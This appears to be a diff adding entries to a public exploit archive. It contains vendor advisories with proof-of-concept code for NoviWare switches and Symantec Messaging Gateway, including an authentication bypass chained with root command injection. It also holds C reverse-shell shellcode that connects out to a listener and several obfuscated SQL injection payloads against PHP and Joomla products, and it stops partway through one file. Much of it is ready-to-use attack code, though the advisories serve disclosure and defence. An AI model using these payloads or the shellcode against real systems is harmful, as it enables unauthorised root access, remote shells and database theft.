 42461,platforms/php/webapps/42461.txt,"Online Quiz Project 1.0 - SQL Injection",2017-08-17,"Ihsan Sencan",php,webapps,0
 42462,platforms/php/webapps/42462.txt,"Photogallery Project 1.0 - SQL Injection",2017-08-17,"Ihsan Sencan",php,webapps,0
 42463,platforms/php/webapps/42463.txt,"Doctor Patient Project 1.0 - SQL Injection",2017-08-17,"Ihsan Sencan",php,webapps,0
+42482,platforms/php/webapps/42482.txt,"Food Ordering Script 1.0 - SQL Injection",2017-08-17,"Ihsan Sencan",php,webapps,0
+42487,platforms/php/webapps/42487.txt,"LiveCRM 1.0 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
+42488,platforms/php/webapps/42488.txt,"LiveSupport 1.0 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
+42489,platforms/php/webapps/42489.txt,"LiveInvoices 1.0 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
+42490,platforms/php/webapps/42490.txt,"LiveSales 1.0 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
+42491,platforms/php/webapps/42491.txt,"LiveProjects 1.0 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
+42519,platforms/jsp/webapps/42519.txt,"Symantec Messaging Gateway 10.6.3-2 - Unauthenticated root Remote Command Execution",2017-08-18,"Philip Pettersson",jsp,webapps,0
+42492,platforms/php/webapps/42492.txt,"Joomla! Component Appointment 1.1 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
+42493,platforms/php/webapps/42493.txt,"Joomla! Component Twitch Tv 1.1 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
+42494,platforms/php/webapps/42494.txt,"Joomla! Component KissGallery 1.0.0 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
+42496,platforms/php/webapps/42496.txt,"Matrimony Script 2.7 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
+42497,platforms/php/webapps/42497.txt,"eCardMAX 10.5 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
+42499,platforms/php/webapps/42499.txt,"SOA School Management 3.0 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
+42500,platforms/php/webapps/42500.txt,"Joomla! Component Zap Calendar Lite 4.3.4 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
+42501,platforms/php/webapps/42501.txt,"Joomla! Component Calendar Planner 1.0.1 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
+42502,platforms/php/webapps/42502.txt,"Joomla! Component SP Movie Database 1.3 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
+42504,platforms/php/webapps/42504.txt,"DeWorkshop 1.0 - Arbitrary File Upload",2017-08-18,"Ihsan Sencan",php,webapps,0
+42517,platforms/xml/webapps/42517.txt,"QuantaStor Software Defined Storage < 4.3.1 - Multiple Vulnerabilities",2017-08-18,VVVSecurity,xml,webapps,0

platforms/hardware/dos/42518.txt

@@ -0,0 +1,161 @@
+NoviFlow NoviWare <= NW400.2.6 multiple vulnerabilities
+
+
+Introduction
+==========
+NoviWare is a high-performance OpenFlow 1.3, 1.4 and 1.5 compliant
+switch software developed by NoviFlow and available for license to
+network equipment manufacturers.
+Multiple vulnerabilities were identified in the NoviWare software
+deployed on NoviSwitch devices. They could allow a remote attacker to
+gain privileged code execution on the switch (non-default
+configuration) or a low-privileged CLI user to execute code as root.
+
+
+CVEs
+=====
+* CVE-2017-12784: remote code execution in novi_process_manager_daemon
+Indicative CVSS v2 base score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)
+
+* CVE-2017-12785: cli breakout in novish
+Indicative CVSS v2 base score: 6.8 (AV:L/AC:L/Au:S/C:C/I:C/A:C)
+
+* CVE-2017-12786: remote code execution in noviengine and cliengine
+Indicative CVSS v2 base score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)
+
+
+Affected versions
+==============
+NoviWare <= NW400.2.6 and devices where a vulnerable NoviWare version
+is deployed
+
+
+Author
+======
+François Goichon - Google Security Team
+
+
+CVE-2017-12784
+==============
+Remote code execution in novi_process_manager_daemon
+
+Summary
+-------------
+The NoviWare switching software distribution is prone to two distinct
+bugs which could potentially allow a remote, unauthenticated attacker
+to gain privileged (root) code execution on the switch device.
+- A flaw when applying ACL changes requested from the CLI could expose
+the novi_process_manager_daemon network service
+- This network service is prone to command injection and a stack-based
+buffer overflow
+
+Reproduction
+------------------
+If TCP port 2020 is accepting connections from the network, the
+following python script can be used to ping yourself on vulnerable
+versions :
+---
+from struct import pack
+import socket
+
+s = socket.socket()
+s.connect((<switch host>, 2020))
+
+payload = pack("<I", 0xffffffff).ljust(0x24) + "ping <your ip>; echo\x00"
+s.sendall(pack("<II", 1, len(payload)+8))
+s.sendall(payload)
+
+s.close()
+---
+
+On vulnerable versions, the appliance will perform an ICMP request to
+the specified IP, which can be observed in network logs.
+
+Remediation
+-----------------
+- Upgrade to NoviWare400 3.0 or later.
+- NoviFlow customers should have received instructions on how to get
+the latest release along with release notes. For more information,
+contact support@noviflow.com.
+
+
+CVE-2017-12785
+==============
+Cli breakout in novish
+
+Summary
+-------------
+The NoviWare switching software distribution is prone to a buffer
+overflow and a command injection, allowing authenticated,
+low-privileged users to break out of the CLI and execute commands as
+root.
+
+Reproduction
+------------------
+Log in to the appliance via SSH and run the following command from the CLI:
+--
+noviswitch# show log cli username
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+--
+
+If the appliance is vulnerable, the cli crashes and the session ends.
+
+Remediation
+-----------------
+- Upgrade to NoviWare400 3.0 or later.
+- NoviFlow customers should have received instructions on how to get
+the latest release along with release notes. For more information,
+contact support@noviflow.com.
+
+
+CVE-2017-12786
+==============
+Remote code execution in noviengine and cliengine
+
+Summary
+-------------
+The NoviWare switching software distribution is prone to two distinct
+bugs which could potentially allow a remote, unauthenticated attacker
+to gain privileged (root) code execution on the switch device.
+- A flaw when applying ACL changes requested from the CLI could expose
+noviengine and cliengine network services
+- These network services are prone to a stack-based buffer overflow
+when unpacking serialized values.
+
+Reproduction
+------------------
+If TCP ports 9090 or 12345 are accepting connections from the network,
+the following python script can be used to cause a crash on vulnerable
+versions :
+---
+from struct import pack
+import socket
+
+s = socket.socket()
+s.connect((<switch host>, <9090 or 12345>))
+
+payload = "".join([pack("<I", 4) + "AAAA" for i in xrange(408)])
+payload = pack("<IIQ", 0, len(payload) + 16, 0) + payload
+s.sendall(payload)
+
+s.read(1)
+s.close()
+---
+
+A watchdog should restart the service if it has crashed.
+
+Remediation
+-----------------
+- Upgrade to NoviWare400 3.0 or later.
+- NoviFlow customers should have received instructions on how to get
+the latest release along with release notes. For more information,
+contact support@noviflow.com.
+
+
+Disclosure timeline
+===============
+2017/05/11 - Report sent to NoviFlow
+2017/05/26 - Bugs acknowledged and remediation timeline confirmed
+2017/07/27 - NoviWare400 3.0 release fixes all the above vulnerabilities
+2017/08/09 - CVE requests
+2017/08/16 - Public disclosure

platforms/json/webapps/42111.txt

@@ -0,0 +1,47 @@
+Software: Sungard eTRAKiT3
+Version: 3.2.1.17 and possibly lower
+CVE: CVE-2016-6566 (https://www.kb.cert.org/vuls/id/846103)
+Vulnerable Component:  Login page 
+
+
+Description
+================
+The login form is vulnerable to blind SQL injection by an unauthenticated user.
+
+
+Vulnerabilities
+================
+The "valueAsString" parameter inside the JSON payload contained by the "ucLogin_txtLoginId_ClientStat" POST parameter is not properly validated. An unauthenticated remote attacker may modify the POST request and insert a SQL query which will then be executed by the backend server. eTRAKiT 3.2.1.17 was tested, but other versions may also be vulnerable.
+
+ 
+Proof of concept
+================
+Steps to Reproduce:
+	1. Configure browser to use burp suite as proxy
+	2. Turn interceptor on in burp suite
+	3. Attempt to log in to etrakit3 website
+	4. Modify the resulting HTTP request in the following way
+	5. Locate the JSON payload contained by the ucLogin_txtLoginId_ClientStat POST parameter
+	6. Locate the valueAsString parameter inside the JSON payload
+	7. Append SQL code to the end of the value held by the valueAsString parameter, example: {"enabled":true,"emptyMessage":"Username","validationText":"fakeuser","valueAsString":"fakeuser';waitfor delay'0:0:10'--","lastSetTextBoxValue":"fakeuser"}
+
+	
+Solution
+================
+"SunGard Public Sector appreciates that this issue has been brought to our attention.   Our development team has addressed this report with a patch release.  Please contact the SunGard Public Sector TRAKiT Solutions division to request the patch release.  (858) 451-3030." -- (https://www.kb.cert.org/vuls/id/846103)
+
+
+Timeline
+================
+2016-10-17: Discovered
+2016-12-6: CVE Issued
+
+
+Discovered by
+================
+Chris Anastasio 0x616e6173746173696f [ at ] illumant.com
+
+
+About Illumant
+================
+Illumant has conducted thousands of security assessment and compliance engagements, helping over 800 clients protect themselves from cyber-attacks.  Through meticulous manual analysis, Illumant helps companies navigate the security and threat landscape to become more secure, less of a target, and more compliant.  For more information, visit https://illumant.com/

platforms/jsp/webapps/42519.txt

@@ -0,0 +1,183 @@
+This is an advisory for CVE-2017-6327 which is an unauthenticated remote
+code execution flaw in the web interface of Symantec Messaging Gateway
+prior to and including version 10.6.3-2, which can be used to execute
+commands as root.
+
+Symantec Messaging Gateway, formerly known as Brightmail, is a linux-based
+anti-spam/security product for e-mail servers. It is deployed as a physical
+device or with ESX in close proximity to the servers it is designed to
+protect.
+
+=*=*=*=*=*=*=*=*=    TIMELINE
+
+2017-07-07: Reported to Symantec
+2017-08-10: Patch and notice released by Symantec [1]
+2017-08-18: Public technical advisory
+
+=*=*=*=*=*=*=*=*=    DESCRIPTION
+
+- Bug #1: Web authentication bypass
+
+The web management interface is available via HTTPS, and you can't do much
+without logging in.
+
+If the current session (identified by the `JSESSIONID` cookie) has the
+`user` attribute set, the session is considered authenticated.
+
+The file LoginAction.class defines a number of public methods and they can
+all be reached via unauthenticated web requests.
+
+By making a GET request to `/brightmail/action1.do?method=method_name` we
+can execute `LoginAction.method_name` if `method_name` is a public method.
+
+One such public method which will be the target of our authentication
+bypass is called `LoginAction.notificationLogin`.
+
+It does the following:
+
+1. Decrypt the `notify` parameter using `BrightmailDecrypt.decrypt`
+2. Creates a new `UserTO` object using the decrypted `notify` parameter as
+an email value
+3. Creates a new session, invalidating the old one if necessary
+4. Sets the `user` attribute of the newly created session to our
+constructed UserTO object
+
+It essentially takes a username value from a GET parameter and logs you in
+as this user if it exists. If not, it creates this user for you.
+
+We need to encrypt our `notify` argument so that
+`BrightmailDecrypt.decrypt` will decrypt it properly. Fortunately the
+encryption is just PBEWithMD5AndDES using a static password, conveniently
+included in the code itself. I won't include the encryption password or a
+fully encrypted notify string in this post.
+
+
+Example request:
+
+GET
+/brightmail/action1.do?method=notificationLogin&notify=MTIzNDU2Nzg%3d6[...]&id=test
+HTTP/1.1
+...
+
+
+HTTP/1.1 302 Found
+Server: Apache-Coyote/1.1
+...
+Set-Cookie: JSESSIONID=9E45E9F70FAC0AADAC9EB7A03532F65D; Path=/brightmail;
+Secure; HttpOnly
+
+
+- Bug #2: Command injection
+
+The RestoreAction.performRestore method can be reached with an
+authenticated session and it takes the restoreSource and
+localBackupFilename parameters.
+
+After a long chain of function calls, localBackupFilename ends up being
+sent to the local "bmagent" daemon listening on port 41002. It will execute
+/opt/Symantec/Brightmail/cli/bin/db-restore with argv[1] being our supplied
+value.
+
+The db-restore script is a sudo wrapper for
+/opt/Symantec/Brightmail/cli/sbin/db-restore, which in turn is a perl
+script containing a command injection in a call to /usr/bin/du.
+
+$ /opt/Symantec/Brightmail/cli/bin/db-restore 'asdf;"`id`";'
+/usr/bin/du: cannot access `/data/backups/asdf': No such file or directory
+sh: uid=0(root) gid=0(root) groups=0(root): command not found
+ERROR: Failed to copy 'asdf;"`id`";' from local backup store: No such file
+or directory
+
+
+This command injection can be exploited from the web management interface
+with a valid session, which we can create using bug #1.
+
+- Combining bug #1 and #2
+
+The last step is to get a CSRF token since the vulnerable performRestore
+function is annotated with @CSRF.
+
+After some quick digging it turns out that all you need to do is call
+/brightmail/common.jsp to get a token that will be valid for all your
+requests.
+
+The URL-encoded value we provide for the `localBackupFileSelection`
+parameter is:
+asdf`id>/data/bcc/webapps/brightmail/output.txt;/bin/uname
+-a>>/data/bcc/webapps/brightmail/output.txt`hehehe
+
+Request:
+
+GET
+/brightmail/admin/restore/action5.do?method=performRestore&symantec.brightmail.key.TOKEN=bbda9b0a52bca4a43cc2b6051cd6b95900068cd3&restoreSource=APPLIANCE&localBackupFileSelection=%61%73%64%66%60%69%64%3e%2f%64%61%74%61%2f%62%63%63%2f%77%65%62%61%70%70%73%2f%62%72%69%67%68%74%6d%61%69%6c%2f%6f%75%74%70%75%74%2e%74%78%74%3b%2f%62%69%6e%2f%75%6e%61%6d%65%20%2d%61%3e%3e%2f%64%61%74%61%2f%62%63%63%2f%77%65%62%61%70%70%73%2f%62%72%69%67%68%74%6d%61%69%6c%2f%6f%75%74%70%75%74%2e%74%78%74%60%68%65%68%65%68%65
+HTTP/1.1
+Host: 192.168.205.220
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:52.0)
+Gecko/20100101 Firefox/52.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Cookie: JSESSIONID=34D61B34698831DB765A9DD5E0049D0B
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+Response:
+
+HTTP/1.1 200 OK
+Server: Apache-Coyote/1.1
+Cache-Control: no-store,no-cache
+Pragma: no-cache
+Expires: Thu, 01 Jan 1970 00:00:00 GMT
+X-Frame-Options: SAMEORIGIN
+Content-Type: text/html;charset=UTF-8
+Content-Length: 803
+Date: Thu, 29 Jun 2017 06:48:12 GMT
+Connection: close
+
+<HTML>
+<title>Symantec Messaging Gateway -&nbsp;Restore</title>
+...
+
+
+Now to confirm that our command output was correctly placed in a file
+inside the webroot.
+
+imac:~% curl -k https://192.168.205.220/brightmail/output.txt
+uid=0(root) gid=0(root) groups=0(root)
+Linux localhost.localdomain 2.6.32-573.3.1.el6.x86_64 #1 SMP Thu Aug 13
+22:55:16 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
+
+
+=*=*=*=*=*=*=*=*=    EXPLOIT OUTPUT
+
+imac:~/brightmail% python brightmail-rce.py
+https://192.168.205.220/brightmail
+bypassing login..
+* JSESSIONID=693079639299816F80016123BE8A0167
+verifying login bypass..
+* Version: 10.6.3
+getting csrf token..
+* 1e35af8c567d3448a65c8516a835cec30b6b8b73
+done, verifying..
+
+uid=501(bcc) gid=99(nobody) euid=0(root) egid=0(root)
+groups=0(root),99(nobody),499(mysql),502(bcc)
+Linux localhost.localdomain 2.6.32-573.3.1.el6.x86_64 #1 SMP Thu Aug 13
+22:55:16 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
+
+
+# cat /etc/issue
+
+Symantec Messaging Gateway
+Version 10.6.3-2
+Copyright (c) 1998-2017 Symantec Corporation.  All rights reserved.
+
+
+=*=*=*=*=*=*=*=*=    REFERENCES
+
+[1]
+https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20170810_00
+
+=*=*=*=*=*=*=*=*=    CREDIT
+
+Philip Pettersson

platforms/lin_x86-64/shellcode/42485.c

@@ -0,0 +1,105 @@
+/*
+;Title: Linux/x86_64 - Reverse Shell Shellcode (192.168.1.2:4444)
+;Author: Touhid M.Shaikh
+;Contact: https://github.com/touhidshaikh
+;Category: Shellcode
+;Architecture: Linux x86_64
+;Description: Reverse Shell, Run nc and listen port  4444.
+;Shellcode Length:  153
+;Tested on :  Debian 4.9.30-2kali1 (2017-06-22) x86_64 GNU/Linux
+
+
+
+===COMPILATION AND EXECUTION Assemmbly file===
+
+#nasm -f elf64 shell.asm -o shell.o <=== Making Object File
+
+#ld shell.o -o shell <=== Making Binary File
+
+#./bin2shell.sh shell <== xtract hex code from the binary(
+https://github.com/touhidshaikh/bin2shell)
+
+=================SHELLCODE(INTEL FORMAT)=================
+
+global _start
+
+
+_start:
+xor rax,rax
+add rax, 41
+xor rdi,rdi
+mov rdx, rdi
+add rdi, 2
+xor rsi,rsi
+add rsi, 1
+syscall
+
+mov rdi, rax
+
+xor rax, rax
+push rax
+add rax,0x2
+mov dword [rsp-4], 0x0201a8c0       : IP : 192.168.1.2, Change what u
+want(Little Endian)
+mov word [rsp-6], 0x5c11            ; PORT : 4444, Change what u
+want(Little Endian)
+mov word [rsp-8], ax
+sub rsp, 8
+add rax, 40
+mov rsi, rsp
+xor rdx,rdx
+add rdx, 16
+syscall
+xor rax,rax
+mov rsi, rax
+add rax, 33
+    syscall
+    xor rax,rax
+    add rax, 33
+    xor rsi,rsi
+    add rsi, 1
+    syscall
+    xor rax, rax
+    add rax, 33
+    xor rsi,rsi
+    add rsi, 2
+    syscall
+    xor rax, rax
+    push rax
+    mov rbx, 0x68732f2f6e69622f
+    push rbx
+    mov rdi, rsp
+push rax
+    mov rdx, rsp
+    push rdi
+    mov rsi, rsp
+    add rax, 59
+    syscall
+
+===================END HERE============================
+
+====================FOR C Compile===========================
+
+Compile with gcc with some options.
+
+# gcc -fno-stack-protector -z execstack shell-testing.c -o shell-testing
+
+*/
+
+#include<stdio.h>
+#include<string.h>
+
+
+unsigned char code[] = \
+"\x48\x31\xc0\x48\x83\xc0\x29\x48\x31\xff\x48\x89\xfa\x48\x83\xc7\x02\x48\x31\xf6\x48\x83\xc6\x01\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\x48\x83\xc0\x02\xc7\x44\x24\xfc\xc0\xa8\x01\x02\x66\xc7\x44\x24\xfa\x11\x5c\x66\x89\x44\x24\xf8\x48\x83\xec\x08\x48\x83\xc0\x28\x48\x89\xe6\x48\x31\xd2\x48\x83\xc2\x10\x0f\x05\x48\x31\xc0\x48\x89\xc6\x48\x83\xc0\x21\x0f\x05\x48\x31\xc0\x48\x83\xc0\x21\x48\x31\xf6\x48\x83\xc6\x01\x0f\x05\x48\x31\xc0\x48\x83\xc0\x21\x48\x31\xf6\x48\x83\xc6\x02\x0f\x05\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05";
+
+main()
+{
+
+printf("Shellcode Length:  %d\n", (int)strlen(code));
+
+int (*ret)() = (int(*)())code;
+
+ret();
+
+}

platforms/php/webapps/42482.txt

@@ -0,0 +1,29 @@
+# # # # #
+# Exploit Title: Food Ordering Script 1.0 - SQL Injection
+# Dork: N/A
+# Date: 17.08.2017
+# Vendor Homepage : http://www.earthtechnology.co.in/our_products.html
+# Software Link: https://www.foodorderingscript.com/
+# Demo: https://www.foodorderingscript.com/demo-new/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands...
+# 	
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/restaurantDetails.php?resid=[SQL]
+# 
+# 1'+/*!00600aNd*/(/*!00600SelEcT*/+0x30783331+/*!00600fRoM*/+(/*!00600SelEcT*/+CoUnT(*),/*!00600cOncaT*/((/*!00600SeleCT*/(/*!00600SeleCT*/+/*!00600cOncaT*/(cAST(daTabAsE()+aS+/*!00600cHAR*/),0x7e,0x496873616E53656e63616e))+/*!00600fRoM*/+iNFORMATION_sCHEMA.tABLES+/*!00600wHERE*/+tABLE_sCHEMA=daTabAsE()+lIMIT+0,1),fLooR(/*!00600rAND*/(0)*2))x+/*!00600fRoM*/+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+/*!00600aNd*/+''='
+# 
+# http://localhost/[PATH]/search1det.php?action=orderFullDetails&orderid=[SQL]
+# 
+# Etc...
+# # # # #

platforms/php/webapps/42487.txt

@@ -0,0 +1,30 @@
+# # # # #
+# Exploit Title: LiveCRM 1.0 - SQL Injection
+# Dork: N/A
+# Date: 18.08.2017
+# Vendor Homepage : http://livecrm.co/
+# Software Link: https://codecanyon.net/item/livecrm-complete-business-management-solution/20249151
+# Demo: http://demo.livecrm.co/livecrm/web/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows the working user group to inject sql commands ...
+# 	
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/index.php?r=estimate/estimate/view&id=[SQL]
+# 64+/*!22222UnIoN*/(/*!22222SeLeCT*/+0x283129,0x283229,0x283329,0x283429,(select(@x)/*!22222from*/(/*!22222select*/(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(/*!22222select*/(0)/*!22222from*/(information_schema.columns)/*!22222where*/(table_schema=database())and(0x00)in(@x:=/*!22222CoNcaT*/(@x,0x3c62723e,if((@tbl!=table_name),/*!22222CoNcaT*/(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e),0x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x),0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329)--+-
+# 
+# http://localhost/[PATH]/index.php?r=sales/lead/view&id=[SQL]
+# 
+# http://localhost/[PATH]/index.php?r=invoice/invoice/view&id=[SQL]
+# 
+# Etc...
+# # # # #

platforms/php/webapps/42488.txt

@@ -0,0 +1,30 @@
+# # # # #
+# Exploit Title: LiveSupport 1.0 - SQL Injection
+# Dork: N/A
+# Date: 18.08.2017
+# Vendor Homepage : http://livecrm.co/
+# Software Link: https://codecanyon.net/item/livesupport-complete-ticketing-system-crm/20243447
+# Demo: http://livesupport.livecrm.co/livecrm/web/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows the users to inject sql commands ...
+# 	
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/index.php?Ticket[queue_id]=2&r=support/ticket/queue&id=[SQL]
+# 2&r=support/ticket/queue&id=22+/*!44455PrOceDure*/+/*!44455AnaLysE*/+(eXtrActvAlue(0,/*!44455concat*/(0x27,0x3a,version(),0x7e,database())),0)--+-
+# 
+# http://localhost/[PATH]/index.php?r=support/ticket-resolution/update&id=[SQL]
+# 
+# http://localhost/[PATH]/index.php?r=support/ticket/update&id=[SQL]
+# 
+# Etc...
+# # # # #

platforms/php/webapps/42489.txt

@@ -0,0 +1,28 @@
+# # # # #
+# Exploit Title: LiveInvoices 1.0 - SQL Injection
+# Dork: N/A
+# Date: 18.08.2017
+# Vendor Homepage : http://livecrm.co/
+# Software Link: https://codecanyon.net/item/liveinvoices-complete-invoicing-system-crm/20243375
+# Demo: http://liveinvoices.livecrm.co/livecrm/web/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows the users to inject sql commands ...
+# 	
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/index.php?r=estimate/estimate/view&id=[SQL]
+# 62++/*!11111UnioN*/(/*!11111sELECt*/+0x283129,0x283229,0x283329,0x283429,(select(@x)/*!22222from*/(/*!22222select*/(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(/*!22222select*/(0)/*!22222from*/(information_schema.columns)/*!22222where*/(table_schema=database())and(0x00)in(@x:=/*!22222CoNcaT*/(@x,0x3c62723e,if((@tbl!=table_name),/*!22222CoNcaT*/(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e),0x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x),0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329)--+-
+# 
+# http://localhost/[PATH]/index.php?r=invoice/invoice/view&id=[SQL]
+# 
+# Etc...
+# # # # #

platforms/php/webapps/42490.txt

@@ -0,0 +1,28 @@
+# # # # #
+# Exploit Title: LiveSales 1.0 - SQL Injection
+# Dork: N/A
+# Date: 18.08.2017
+# Vendor Homepage : http://livecrm.co/
+# Software Link: https://codecanyon.net/item/livesales-complete-sales-management-crm/20243171
+# Demo: http://livesales.livecrm.co/livecrm/web/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows the users to inject sql commands ...
+# 	
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/index.php?r=estimate/estimate/view&id=[SQL]
+# 65+/*!11111UnioN*/(/*!11111sELECt*/+0x283129,0x283229,0x283329,0x283429,(select(@x)/*!22222from*/(/*!22222select*/(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(/*!22222select*/(0)/*!22222from*/(information_schema.columns)/*!22222where*/(table_schema=database())and(0x00)in(@x:=/*!22222CoNcaT*/(@x,0x3c62723e,if((@tbl!=table_name),/*!22222CoNcaT*/(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e),0x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x),0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329)--+-
+# 
+# http://localhost/[PATH]/index.php?r=sales/lead/view&id=[SQL]
+# 
+# Etc...
+# # # # #

platforms/php/webapps/42491.txt

@@ -0,0 +1,29 @@
+# # # # #
+# Exploit Title: LiveProjects 1.0 - SQL Injection
+# Dork: N/A
+# Date: 18.08.2017
+# Vendor Homepage : http://livecrm.co/
+# Software Link: https://codecanyon.net/item/liveprojects-complete-project-management-crm/10436800
+# Demo: http://liveprojects.livecrm.co/livecrm/web/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows the users to inject sql commands ...
+# 	
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/index.php?r=pmt/project/project-view&id=[SQL]
+# 
+# http://localhost/[PATH]/index.php?r=pmt/task/task-view&id=[SQL]
+# 
+# http://localhost/[PATH]/index.php?r=pmt/project/project-view&id=[SQL]
+# 
+# Etc...
+# # # # #

platforms/php/webapps/42492.txt

@@ -0,0 +1,30 @@
+# # # # #
+# Exploit Title: Joomla! Component Appointment v1.1 - SQL Injection
+# Dork: N/A
+# Date: 18.08.2017
+# Vendor Homepage: https://www.joomlaextensions.co.in/
+# Software Link: https://extensions.joomla.org/extensions/extension/appointment/
+# Demo: http://joomlaextension.biz/appointment/
+# Version: 1.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows the working user group to inject sql commands ...
+# 	
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/index.php/service-list?view=allorder&ser_id=[SQL] 
+# -84+/*!11111union*/+/*!11111select*/+(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32))--+-
+# 
+# http://localhost/[PATH]/index.php/service-list?view=allorder&emp_id=[SQL]
+# 
+# <input type="hidden" name="sername" id="sername" value="............
+# 
+# Etc...
+# # # # #

platforms/php/webapps/42493.txt

@@ -0,0 +1,28 @@
+# # # # #
+# Exploit Title: Joomla! Component Twitch Tv 1.1 - SQL Injection
+# Dork: N/A
+# Date: 18.08.2017
+# Vendor Homepage: http://www.raindropsinfotech.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/sports-a-games/game-servers/twitch-tv-component/
